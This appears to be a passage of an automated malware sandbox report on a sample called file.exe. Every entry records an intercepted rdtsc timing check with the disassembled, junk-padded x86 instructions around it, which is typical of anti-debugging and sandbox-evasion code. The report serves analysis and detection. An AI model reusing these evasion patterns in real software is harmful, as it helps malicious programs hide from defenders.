                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E19E6B second address: E19E89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b js 00007FE478BEC553h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E19E89 second address: E19E8E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E13463 second address: E13467 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E19F10 second address: E19F1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jnl 00007FE478F58EB6h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E19F1C second address: E19F4B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE478BEC552h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FE478BEC555h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E19F4B second address: E19F69 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FE478F58EC9h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1AE06 second address: E1AE0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1AE0A second address: E1AE18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007FE478F58EB6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1AE18 second address: E1AE73 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a mov edi, ebx 0x0000000c jl 00007FE478BEC54Ch 0x00000012 sub edi, 5147B520h 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push ebp 0x0000001d call 00007FE478BEC548h 0x00000022 pop ebp 0x00000023 mov dword ptr [esp+04h], ebp 0x00000027 add dword ptr [esp+04h], 00000014h 0x0000002f inc ebp 0x00000030 push ebp 0x00000031 ret 0x00000032 pop ebp 0x00000033 ret 0x00000034 mov ebx, dword ptr [ebp+122D2CFDh] 0x0000003a push 00000000h 0x0000003c call 00007FE478BEC54Ah 0x00000041 jns 00007FE478BEC54Ch 0x00000047 pop ebx 0x00000048 xchg eax, esi 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c push eax 0x0000004d push edx 0x0000004e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E17EED second address: E17EF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1AE73 second address: E1AE7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1A1F0 second address: E1A1F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E19060 second address: E19066 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1CDFB second address: E1CDFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1CDFF second address: E1CE03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1CE03 second address: E1CE6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a mov ebx, dword ptr [ebp+122D375Fh] 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push ecx 0x00000015 call 00007FE478F58EB8h 0x0000001a pop ecx 0x0000001b mov dword ptr [esp+04h], ecx 0x0000001f add dword ptr [esp+04h], 00000018h 0x00000027 inc ecx 0x00000028 push ecx 0x00000029 ret 0x0000002a pop ecx 0x0000002b ret 0x0000002c sub dword ptr [ebp+122D350Bh], ebx 0x00000032 push 00000000h 0x00000034 call 00007FE478F58EC8h 0x00000039 mov edi, dword ptr [ebp+122D3847h] 0x0000003f pop ebx 0x00000040 push eax 0x00000041 push eax 0x00000042 push edx 0x00000043 ja 00007FE478F58EBCh 0x00000049 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1DEF1 second address: E1DEFF instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FE478BEC546h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1B02A second address: E1B090 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a mov bx, dx 0x0000000d push dword ptr fs:[00000000h] 0x00000014 mov edi, 07371046h 0x00000019 movzx edi, cx 0x0000001c mov dword ptr fs:[00000000h], esp 0x00000023 push 00000000h 0x00000025 push edi 0x00000026 call 00007FE478F58EB8h 0x0000002b pop edi 0x0000002c mov dword ptr [esp+04h], edi 0x00000030 add dword ptr [esp+04h], 0000001Bh 0x00000038 inc edi 0x00000039 push edi 0x0000003a ret 0x0000003b pop edi 0x0000003c ret 0x0000003d mov eax, dword ptr [ebp+122D15A1h] 0x00000043 sub dword ptr [ebp+122D2785h], esi 0x00000049 push FFFFFFFFh 0x0000004b jbe 00007FE478F58EB8h 0x00000051 mov bh, 61h 0x00000053 push eax 0x00000054 push edi 0x00000055 push eax 0x00000056 push edx 0x00000057 jns 00007FE478F58EB6h 0x0000005d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1BE77 second address: E1BF05 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 je 00007FE478BEC546h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jns 00007FE478BEC550h 0x00000013 nop 0x00000014 jnl 00007FE478BEC546h 0x0000001a push dword ptr fs:[00000000h] 0x00000021 mov dword ptr [ebp+1247850Ch], ecx 0x00000027 mov dword ptr fs:[00000000h], esp 0x0000002e push 00000000h 0x00000030 push ecx 0x00000031 call 00007FE478BEC548h 0x00000036 pop ecx 0x00000037 mov dword ptr [esp+04h], ecx 0x0000003b add dword ptr [esp+04h], 0000001Bh 0x00000043 inc ecx 0x00000044 push ecx 0x00000045 ret 0x00000046 pop ecx 0x00000047 ret 0x00000048 mov eax, dword ptr [ebp+122D04E5h] 0x0000004e push 00000000h 0x00000050 push ebx 0x00000051 call 00007FE478BEC548h 0x00000056 pop ebx 0x00000057 mov dword ptr [esp+04h], ebx 0x0000005b add dword ptr [esp+04h], 00000018h 0x00000063 inc ebx 0x00000064 push ebx 0x00000065 ret 0x00000066 pop ebx 0x00000067 ret 0x00000068 mov edi, dword ptr [ebp+122D3827h] 0x0000006e push FFFFFFFFh 0x00000070 push eax 0x00000071 push eax 0x00000072 pushad 0x00000073 push eax 0x00000074 push edx 0x00000075 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E255AC second address: E255B6 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FE478F58EB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E255B6 second address: E255BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E237AD second address: E237B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E237B3 second address: E237B8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E267C5 second address: E267E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE478F58EC0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E267E1 second address: E267E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E267E5 second address: E267EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E267EB second address: E267F0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E2873F second address: E28743 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E276B0 second address: E276BD instructions: 0x00000000 rdtsc 0x00000002 jp 00007FE478BEC546h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E277A2 second address: E277B0 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E277B0 second address: E277B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E30618 second address: E30622 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FE478F58EB6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E30622 second address: E3062E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3062E second address: E30632 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E30A60 second address: E30A65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E35120 second address: E35137 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FE478F58EBCh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E35137 second address: E35154 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FE478BEC54Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 jl 00007FE478BEC546h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E35154 second address: E3518E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FE478F58EC6h 0x0000000b popad 0x0000000c mov eax, dword ptr [eax] 0x0000000e jmp 00007FE478F58EBFh 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a push edx 0x0000001b pop edx 0x0000001c push edi 0x0000001d pop edi 0x0000001e popad 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E351FA second address: E351FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E351FE second address: E35227 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FE478F58EB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b push eax 0x0000000c jbe 00007FE478F58EC0h 0x00000012 mov eax, dword ptr [esp+04h] 0x00000016 jo 00007FE478F58EC0h 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E352D5 second address: E352DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3535E second address: C5DABD instructions: 0x00000000 rdtsc 0x00000002 jo 00007FE478F58EBCh 0x00000008 je 00007FE478F58EB6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 xor dword ptr [esp], 15C7D9D3h 0x00000017 jmp 00007FE478F58EC5h 0x0000001c push dword ptr [ebp+122D0801h] 0x00000022 jmp 00007FE478F58EC1h 0x00000027 call dword ptr [ebp+122D1907h] 0x0000002d pushad 0x0000002e cld 0x0000002f pushad 0x00000030 mov esi, 455831ACh 0x00000035 mov ecx, dword ptr [ebp+122D393Fh] 0x0000003b popad 0x0000003c xor eax, eax 0x0000003e jno 00007FE478F58EC8h 0x00000044 sub dword ptr [ebp+122D1BC5h], esi 0x0000004a mov edx, dword ptr [esp+28h] 0x0000004e or dword ptr [ebp+122D1BC5h], eax 0x00000054 mov dword ptr [ebp+122D37EBh], eax 0x0000005a jno 00007FE478F58EB7h 0x00000060 mov esi, 0000003Ch 0x00000065 sub dword ptr [ebp+122D1BC5h], ebx 0x0000006b add esi, dword ptr [esp+24h] 0x0000006f pushad 0x00000070 mov di, bx 0x00000073 add dh, 00000020h 0x00000076 popad 0x00000077 lodsw 0x00000079 pushad 0x0000007a movsx eax, di 0x0000007d mov ebx, dword ptr [ebp+122D399Bh] 0x00000083 popad 0x00000084 add eax, dword ptr [esp+24h] 0x00000088 add dword ptr [ebp+122D1BC5h], edi 0x0000008e mov ebx, dword ptr [esp+24h] 0x00000092 pushad 0x00000093 cld 0x00000094 sub dword ptr [ebp+122D1BC5h], ecx 0x0000009a popad 0x0000009b jmp 00007FE478F58EBEh 0x000000a0 push eax 0x000000a1 push esi 0x000000a2 push eax 0x000000a3 push edx 0x000000a4 push edi 0x000000a5 pop edi 0x000000a6 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3A86D second address: E3A871 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3A871 second address: E3A88D instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FE478F58EB6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jng 00007FE478F58EB6h 0x00000013 je 00007FE478F58EB6h 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3A88D second address: E3A892 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3AFF8 second address: E3AFFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3AFFC second address: E3B005 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3B005 second address: E3B013 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop esi 0x00000008 pushad 0x00000009 push ecx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3B575 second address: E3B57F instructions: 0x00000000 rdtsc 0x00000002 ja 00007FE478BEC546h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3B99A second address: E3B9B0 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FE478F58EBAh 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c jbe 00007FE478F58EB6h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3FADC second address: E3FAE0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3FAE0 second address: E3FAEA instructions: 0x00000000 rdtsc 0x00000002 jne 00007FE478F58EB6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3FAEA second address: E3FAF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E3FAF0 second address: E3FB1B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE478F58EC7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FE478F58EBCh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD8E3C second address: DD8E50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jns 00007FE478BEC546h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jg 00007FE478BEC54Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E453E1 second address: E453EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007FE478F58EB6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E44174 second address: E4417E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4417E second address: E4418B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4418B second address: E4418F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DF6696 second address: DF66A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jp 00007FE478F58EB6h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4444A second address: E4445F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FE478BEC546h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jnc 00007FE478BEC546h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4445F second address: E44463 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E44463 second address: E444B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jns 00007FE478BEC54Eh 0x0000000e pushad 0x0000000f jmp 00007FE478BEC558h 0x00000014 pushad 0x00000015 popad 0x00000016 jmp 00007FE478BEC558h 0x0000001b js 00007FE478BEC546h 0x00000021 popad 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4476F second address: E44774 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E44774 second address: E44779 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E44779 second address: E44787 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FE478F58EB6h 0x0000000a pop eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E44E55 second address: E44E59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E44E59 second address: E44E7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FE478F58EC4h 0x00000009 jmp 00007FE478F58EBEh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E44E7F second address: E44EA6 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FE478BEC546h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jg 00007FE478BEC557h 0x00000010 jmp 00007FE478BEC551h 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pushad 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4800D second address: E4801A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4801A second address: E48030 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FE478BEC546h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnl 00007FE478BEC54Ch 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E48030 second address: E4803A instructions: 0x00000000 rdtsc 0x00000002 je 00007FE478F58EBEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DD59EA second address: DD5A01 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007FE478BEC551h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E4B58E second address: E4B592 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E15CB5 second address: E15D0B instructions: 0x00000000 rdtsc 0x00000002 jc 00007FE478BEC558h 0x00000008 jmp 00007FE478BEC552h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push eax 0x00000013 call 00007FE478BEC548h 0x00000018 pop eax 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d add dword ptr [esp+04h], 0000001Ah 0x00000025 inc eax 0x00000026 push eax 0x00000027 ret 0x00000028 pop eax 0x00000029 ret 0x0000002a lea eax, dword ptr [ebp+1248B9E0h] 0x00000030 sub dword ptr [ebp+122D1816h], esi 0x00000036 push eax 0x00000037 push eax 0x00000038 push edx 0x00000039 push ebx 0x0000003a jns 00007FE478BEC546h 0x00000040 pop ebx 0x00000041 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E15D0B second address: DF6682 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FE478F58EB8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007FE478F58EB8h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 mov edx, dword ptr [ebp+122D18F5h] 0x0000002d mov dword ptr [ebp+124688F0h], ecx 0x00000033 sub dword ptr [ebp+122D193Bh], ecx 0x00000039 call dword ptr [ebp+122D18DBh] 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007FE478F58EC4h 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E16234 second address: E16241 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jl 00007FE478BEC546h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E16241 second address: E16258 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jnl 00007FE478F58EB6h 0x00000010 push eax 0x00000011 pop eax 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E16258 second address: E1625C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1625C second address: E16260 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1667C second address: E16686 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FE478BEC546h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E16686 second address: E166AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FE478F58EBDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FE478F58EBFh 0x00000012 rdtsc
